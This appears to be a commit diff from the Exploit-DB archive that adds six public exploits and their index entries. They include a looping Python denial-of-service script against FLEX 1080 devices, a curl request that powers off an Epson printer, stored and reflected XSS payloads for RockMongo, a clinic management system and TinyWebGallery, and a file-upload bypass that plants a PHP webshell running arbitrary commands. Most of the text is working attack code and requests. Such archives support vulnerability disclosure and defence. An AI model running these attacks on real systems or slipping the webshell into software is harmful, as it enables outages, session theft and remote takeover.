DB: 2023-05-14

7 changes to exploits/shellcodes/ghdb

FLEX 1080 < 1085 Web 1.6.0 - Denial of Service

Epson Stylus SX510W Printer Remote Power Off - Denial of Service

Job Portal 1.0 - File Upload Restriction Bypass

Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)

RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)

TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)

exploits/android/dos/51438.py

@@ -0,0 +1,58 @@
+# Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service
+# Date: 2023-05-06
+# Exploit Author: Mr Empy
+# Vendor Homepage: https://www.tem.ind.br/
+# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
+# Version: 1.6.0
+# Tested on: Android
+# CVE ID: CVE-2022-2591
+#!/usr/bin/env python3
+import requests
+import re
+import argparse
+from colorama import Fore
+import time
+
+def main():
+    def banner():
+        print('''
+            ________    _______  __
+           / ____/ /   / ____/ |/ /
+          / /_  / /   / __/  |   /
+         / __/ / /___/ /___ /   |
+        /_/   /_____/_____//_/|_|
+
+[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]
+
+''')
+    def reboot():
+        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')
+        if 'Rebooting' in r.text:
+            pass
+        else:
+            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
+não é vulnerável')
+            quit()
+
+    banner()
+    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')
+    while True:
+        try:
+            reboot()
+            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardware
+derrubado com sucesso!')
+            time.sleep(1)
+        except:
+#            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardware
+está inativo')
+            pass
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t','--target', action='store', help='Target',
+dest='target', required=True)
+    arguments = parser.parse_args()
+    try:
+        main()
+    except KeyError:
+        quit()

exploits/hardware/remote/51441.txt

@@ -0,0 +1,27 @@
+# Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2020-05-16
+# Vendor Homepage: https://www.epson.es/
+# Software Link :
+https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w
+# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0
+# Tested on: Linux/Windows
+# Vulnerability Type: Denial of Service (DoS)
+
+1. Description
+
+The vulnerability occurs when 2 or more &'s are sent to the server in a row
+("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.
+
+2. Proof of Concept
+
+Request:
+
+curl -s "http://
+<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"
+
+3. Solution:
+
+This version product is deprecated.
+
+-->

exploits/php/webapps/51437.txt

@@ -0,0 +1,108 @@
+# Exploit Title: RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2020-09-19
+# Vendor Homepage: https://github.com/iwind/rockmongo/
+# Software Link : https://github.com/iwind/rockmongo/
+# Tested Version: 1.1.7
+# Tested on:  Windows 7 and 10
+
+# Vulnerability Type: Stored Cross-Site Scripting (XSS)
+
+CVSS v3: 6.5
+CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE: CWE-79
+
+Vulnerability description: RockMongo v1.1.7, does not sufficiently encode
+user-controlled inputs, resulting in a stored and reflected Cross-Site
+Scripting (XSS) vulnerability via the index.php, in multiple parameter.
+
+Proof of concept:
+
+Stored:
+
+POST https://localhost/mongo/index.php?action=db.newCollection&db=local
+HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 69
+Origin: https://localhost
+Connection: keep-alive
+Referer: https://localhost/mongo/index.php?action=db.newCollection&db=local
+Cookie: PHPSESSID=jtjuid60sv6j3encp3cqqps3f7; ROCK_LANG=es_es;
+rock_format=json
+Upgrade-Insecure-Requests: 1
+Host: localhost
+
+name=%09%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&size=0&max=0
+
+Reflected:
+
+https://localhost/mongo/index.php?action=collection.index&db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log
+
+https://localhost/mongo/index.php?action=collection.index&db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E
+
+https://localhost/mongo/index.php?action=db.index&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
+
+http://localhost/mongo/index.php?db=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&collection=startup_log&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
+
+http://localhost/mongo/index.php?db=local&collection=%3C%2Ffont%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cfont%3E&action=collection.index&format=json&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
+
+http://localhost/mongo/index.php?db=local&collection=startup_log&action=collection.index&format=%27+onMouseOver%3D%27alert%281%29%3B&criteria=%7B%0D%0A%0D%0A%7D&newobj=%7B%0D%0A%09%27%24set%27%3A+%7B%0D%0A%09%09%2F%2Fyour+attributes%0D%0A%09%7D%0D%0A%7D&field%5B%5D=_id&order%5B%5D=desc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&field%5B%5D=&order%5B%5D=asc&limit=0&pagesize=10&command=findAll
+
+
+POST http://localhost/mongo/index.php?action=login.index&host=0 HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 109
+Origin: https://localhost
+Authorization: Basic cm9vdDpyb290
+Connection: keep-alive
+Referer: https://localhost/mongo/index.php?action=login.index&host=0
+Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
+rock_format=json
+Upgrade-Insecure-Requests: 1
+Host: localhost
+
+more=0&host=0&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=****&db=&lang=es_es&expire=3
+
+POST http://localhost/mongo/index.php?action=server.command& HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 109
+Origin: https://localhost
+Authorization: Basic cm9vdDpyb290
+Connection: keep-alive
+Referer: https://localhost/mongo/index.php?action=server.command&
+Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
+rock_format=json
+Upgrade-Insecure-Requests: 1
+Host: localhost
+
+command=%7B%0D%0A++listCommands%3A+1%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&format=json
+
+POST http://localhost/mongo/index.php?action=server.execute& HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+Origin: https://localhost
+Authorization: Basic cm9vdDpyb290
+Connection: keep-alive
+Referer: https://localhost/mongo/index.php?action=server.execute&
+Cookie: ROCK_LANG=es_es; PHPSESSID=tpaptf0gtmas344agj5ia6srl1;
+rock_format=json
+Upgrade-Insecure-Requests: 1
+Host: localhost
+
+code=function+%28%29+%7B%0D%0A+++var+plus+%3D+1+%2B+2%3B%0D%0A+++return+plus%3B%0D%0A%7D&db=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

exploits/php/webapps/51439.txt

@@ -0,0 +1,129 @@
+# Exploit Title: Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
+# Date: 27-06-2019
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: https://bigprof.com
+# Software Download Link :
+https://bigprof.com/appgini/applications/online-clinic-management-system
+# Version : 2.2
+# Category: Webapps
+# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
+# CVE :
+# Category: webapps
+
+# Vulnerability Type: Stored Cross-Site Scripting
+
+1. Description
+
+Online Clinic Management System 2.2, does not sufficiently encode
+user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
+vulnerability via the /clinic/medical_records_view.php, in FirstRecord
+parameter, GET and POST request.
+
+
+2. Proof of Concept
+
+GET:
+http://127.0.0.1/clinic/medical_records_view.php?SelectedID=2&record-added-ok=5781&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
+
+POST:
+POST http://127.0.0.1/clinic/medical_records_view.php HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: multipart/form-data;
+boundary=---------------------------1512016725878
+Content-Length: 1172
+Origin: https://127.0.0.1
+Connection: keep-alive
+Referer: https://127.0.0.1/clinic/medical_records_view.php
+Cookie: online_clinic_management_system=bnl1ht0a4n7snalaoqgh8f85b4;
+online_clinic_management_system.dvp_expand=[%22tab_medical_records-patient%22%2C%22tab_events-name_patient%22]
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="current_view"
+
+DVP
+-----------------------------1512016725878
+Content-Disposition: form-data; name="SortField"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="SelectedID"
+
+1
+-----------------------------1512016725878
+Content-Disposition: form-data; name="SelectedField"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="SortDirection"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="FirstRecord"
+
+"><script>alert(1);</script>
+-----------------------------1512016725878
+Content-Disposition: form-data; name="NoDV"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="PrintDV"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="DisplayRecords"
+
+all
+-----------------------------1512016725878
+Content-Disposition: form-data; name="patient"
+
+
+-----------------------------1512016725878
+Content-Disposition: form-data; name="SearchString"
+
+
+-----------------------------1512016725878--
+
+
+1. Description
+
+Online Clinic Management System 2.2, does not sufficiently encode
+user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS)
+vulnerability via the /clinic/patients_view.php, in FirstRecord parameter.
+
+
+2. Proof of Concept
+
+http://127.0.0.1/clinic/patients_view.php?SelectedID=1&record-added-ok=11536&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
+
+
+And Reflected Cross-Site Scripting (XSS) too.
+# Vulnerability Type: Reflected Cross-Site Scripting
+
+1. Description
+
+Online Clinic Management System 2.2, does not sufficiently encode
+user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
+vulnerability via the /clinic/events_view.php, in FirstRecord parameter.
+
+
+2. Proof of Concept
+
+http://127.0.0.1/clinic/events_view.php?SelectedID=2&record-added-ok=7758&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=
+
+
+1. Description
+
+Online Clinic Management System 2.2, does not sufficiently encode
+user-controlled inputs, resulting in a Reflected Cross-Site Scripting (XSS)
+vulnerability via the /clinic/disease_symptoms_view.php, in FirstRecord
+parameter.
+
+
+2. Proof of Concept
+
+http://127.0.0.1/clinic/disease_symptoms_view.php?SelectedID=1&record-added-ok=1096&SortField=&SortDirection=&FirstRecord=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&DisplayRecords=all&SearchString=

exploits/php/webapps/51440.txt

@@ -0,0 +1,80 @@
+<!--
+# Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
+# Date: 27-06-2019
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: https://phpgurukul.com/job-portal-project/
+# Software Link:
+https://phpgurukul.com/?smd_process_download=1&download_id=7855
+# Version: 1.0
+# Tested on: Windows 7 64 Bits / Windows 10 64 Bits
+# CVE :
+# Category: webapps
+
+
+1. Description
+
+File Upload Restriction Bypass vulnerabilities were found in Job Portal
+1.0. This allows for an authenticated user to potentially obtain RCE via
+webshell.
+
+
+2. Proof of Concept
+
+1. Go the user profile >> (/jobportal/applicant/)
+2.- Select profile image and load a valid image.
+3. Turn Burp/ZAP Intercept On
+4. Select webshell - ex: shell.png
+5. Alter request in the upload...
+   Update 'filename' to desired extension. ex: shell.php
+   Not neccesary change content type to 'image/png'
+
+Example exploitation request:
+
+====================================================================================================
+
+POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
+HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
+Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
+Content-Type: multipart/form-data;
+boundary=---------------------------57052814523281
+Content-Length: 555
+Origin: https://127.0.0.1
+Connection: keep-alive
+Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
+Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
+Upgrade-Insecure-Requests: 1
+Host: 127.0.0.1
+
+-----------------------------57052814523281
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+1000000
+-----------------------------57052814523281
+Content-Disposition: form-data; name="photo"; filename="shell.php"
+Content-Type: image/png
+
+?PNG
+...
+<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
+IEND
+-----------------------------57052814523281
+Content-Disposition: form-data; name="savephoto"
+
+
+-----------------------------57052814523281--
+
+====================================================================================================
+
+6. Send the request and visit your new webshell
+   Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
+       nt authority\system
+
+3. Solution:
+
+Patch:
+https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
+
+-->

exploits/php/webapps/51442.txt

@@ -0,0 +1,52 @@
+#Exploit Title: TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)
+#Application: TinyWebGallery
+#Version: v2.5
+#Bugs:  Stored Xss
+#Technology: PHP
+#Vendor URL: http://www.tinywebgallery.com/
+#Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest
+#Date of found: 07-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Login to account
+2. Go to http://localhost/twg25/index.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
+3. Edit
+4. Set folder name section as  <script>alert(4)</script>
+
+
+
+Request :
+
+
+
+POST /twg25/i_frames/i_titel.php HTTP/1.1
+Host: localhost
+Content-Length: 264
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/twg25/i_frames/i_titel.php?twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k
+Connection: close
+
+twg_album=3_youtube.com&twg_show=Q4IPe8_Bo7c.jpg&twg_foffset=&twg_submit=true&twg_titel_page2=true&twg_foldername_mod=1&twg_foldername=%26lt%3Bscript%26gt%3Balert%284%29%26lt%3B%2Fscript%26gt%3B&twg_folderdesc_mod=1&twg_folderdesc=aaaaaaaaaaaaaaaaa&twg_submit=Save
+
+
+5. Go to http://localhost/twg25/index.php

files_exploits.csv

@@ -113,6 +113,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28957,exploits/android/dos/28957.txt,"Android Zygote - Socket and Fork Bomb (Denial of Service)",2013-10-14,"Luca Verderame",dos,android,,2013-10-14,2013-10-14,0,CVE-2011-3918;OSVDB-86227,,,,,
 46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)",2019-02-14,s4vitar,dos,android,,2019-02-14,2019-03-07,1,CVE-2019-9601,"Denial of Service (DoS)",,,http://www.exploit-db.comcom.apowersoft.phone.manager_2019-01-08.apk,
 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,,2018-03-09,2018-03-09,0,CVE-2017-9417,,,,,https://github.com/649/BroadPWN/tree/2ffd7ad310aab18a8e0efe8ec788df5cf6135051
+51438,exploits/android/dos/51438.py,"FLEX 1080 < 1085 Web 1.6.0 - Denial of Service",2023-05-13,"Mr Empy",dos,android,,2023-05-13,2023-05-13,0,CVE-2022-2591,,,,,
 46464,exploits/android/dos/46464.py,"FTP Server 1.32 - Denial of Service",2019-02-28,s4vitar,dos,android,,2019-02-28,2019-03-07,0,CVE-2019-9600,,,,,
 39921,exploits/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow (PoC)",2016-06-10,"Google Security Research",dos,android,,2016-06-10,2016-12-21,1,CVE-2016-2494,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=798
 41211,exploits/android/dos/41211.txt,"Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption",2017-02-01,"Google Security Research",dos,android,,2017-02-01,2017-02-01,1,SVE-2016-7897,"Denial of Service (DoS)",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=979
@@ -3554,6 +3555,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36833,exploits/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware,,2012-02-27,2015-04-27,1,CVE-2012-4923;OSVDB-85698,,,,,https://www.securityfocus.com/bid/52076/info
 36832,exploits/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware,,2012-02-27,2015-04-27,1,CVE-2012-4923;OSVDB-85699,,,,,https://www.securityfocus.com/bid/52076/info
 36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware,,2012-02-27,2015-04-27,1,CVE-2012-4923;OSVDB-85700,,,,,https://www.securityfocus.com/bid/52076/info
+51441,exploits/hardware/remote/51441.txt,"Epson Stylus SX510W Printer Remote Power Off - Denial of Service",2023-05-13,"Rafael Pedrero",remote,hardware,,2023-05-13,2023-05-13,0,,,,,,
 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware,,2003-02-11,2012-10-25,1,CVE-2003-1442;OSVDB-59601,,,,,https://www.securityfocus.com/bid/6824/info
 40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,,2016-10-06,2016-10-06,0,,,,,,
 19091,exploits/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",remote,hardware,,2012-06-12,2016-12-09,1,CVE-2012-1493;OSVDB-82780,,,,,
@@ -20370,6 +20372,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43095,exploits/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15964,,,,,
 42637,exploits/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
 42795,exploits/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",webapps,php,,2017-09-27,2017-09-28,0,CVE-2017-14838,,,,,
+51440,exploits/php/webapps/51440.txt,"Job Portal 1.0 - File Upload Restriction Bypass",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php,,2020-01-07,2020-04-13,1,,,,,,
 46622,exploits/php/webapps/46622.txt,"Job Portal 3.1 - 'job_submit' SQL Injection",2019-03-28,"Mehmet EMIROGLU",webapps,php,80,2019-03-28,2019-03-28,0,,"SQL Injection (SQLi)",,,,
 46152,exploits/php/webapps/46152.txt,"Job Portal Platform 1.0 - SQL Injection",2019-01-14,"Ihsan Sencan",webapps,php,80,2019-01-14,2019-01-14,1,,"SQL Injection (SQLi)",,,,
@@ -24580,6 +24583,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41516,exploits/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
 13967,exploits/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",webapps,php,,2010-06-22,2010-06-22,1,,,,,,
 47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,,2019-12-04,2019-12-04,0,,,,,http://www.exploit-db.comonline-clinic-management-system-2.2.zip,
+51439,exploits/php/webapps/51439.txt,"Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 48429,exploits/php/webapps/48429.txt,"Online Clothing Store 1.0 - 'username' SQL Injection",2020-05-06,"Sushant Kamble",webapps,php,,2020-05-06,2020-05-06,0,,,,,,
 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,,2020-05-07,2020-05-07,0,,,,,,
 48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,,2020-05-06,2020-05-06,0,,,,,,
@@ -28654,6 +28658,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9553,exploits/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,webapps,php,,2009-08-30,2016-10-27,1,OSVDB-57588;CVE-2009-3252,,,,,
 34455,exploits/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (2)",2010-08-12,Affix,webapps,php,,2010-08-12,2014-08-28,1,CVE-2009-3252;OSVDB-57588,,,,,https://www.securityfocus.com/bid/42424/info
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",2022-01-19,Vulnerability-Lab,webapps,php,,2022-01-19,2022-01-19,0,,,,,,
+51437,exploits/php/webapps/51437.txt,"RockMongo 1.1.7 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Rafael Pedrero",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 39682,exploits/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",webapps,php,80,2016-04-11,2016-04-14,0,,,,,http://www.exploit-db.comrockmongo-1.1.7.tar.gz,
 11731,exploits/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,webapps,php,,2010-03-13,,0,,,,,http://www.exploit-db.comRogioBiz_PHP_file_manager_V1.2.zip,
 34840,exploits/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",webapps,php,,2010-10-13,2014-10-02,1,,,,,,https://www.securityfocus.com/bid/44066/info
@@ -30656,6 +30661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16090,exploits/php/webapps/16090.txt,"TinyWebGallery 1.8.3 - Multiple Vulnerabilities",2011-02-01,"Yam Mesicka",webapps,php,,2011-02-01,2012-06-22,0,OSVDB-70743,,,,http://www.exploit-db.comtwg183.zip,
 18322,exploits/php/webapps/18322.txt,"TinyWebGallery 1.8.3 - Remote Command Execution",2012-01-06,Expl0!Ts,webapps,php,,2012-01-06,2012-01-06,0,OSVDB-82603;OSVDB-82481;CVE-2012-5347,,,,,
 36094,exploits/php/webapps/36094.txt,"TinyWebGallery 1.8.4 - Local File Inclusion / SQL Injection",2011-08-31,KedAns-Dz,webapps,php,,2011-08-31,2015-02-16,1,,,,,,https://www.securityfocus.com/bid/49393/info
+51442,exploits/php/webapps/51442.txt,"TinyWebGallery v2.5 - Stored Cross-Site Scripting (XSS)",2023-05-13,"Mirabbas Ağalarov",webapps,php,,2023-05-13,2023-05-13,0,,,,,,
 5947,exploits/php/webapps/5947.txt,"Tips Complete Website 1.2.0 - 'tipid' SQL Injection",2008-06-26,InjEctOr5,webapps,php,,2008-06-25,2016-12-09,1,OSVDB-46526;CVE-2008-5168,,,,,
 23322,exploits/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,webapps,php,,2012-12-12,2012-12-12,0,OSVDB-88394;OSVDB-88393,,,,http://www.exploit-db.comTipsOfTheDay.zip,
 7354,exploits/php/webapps/7354.txt,"Tizag Countdown Creator 3 - Insecure Upload",2008-12-05,ahmadbady,webapps,php,,2008-12-04,2017-01-06,1,OSVDB-51305;CVE-2008-6492,,,,http://www.exploit-db.comtizag-countdown_Version_3.zip,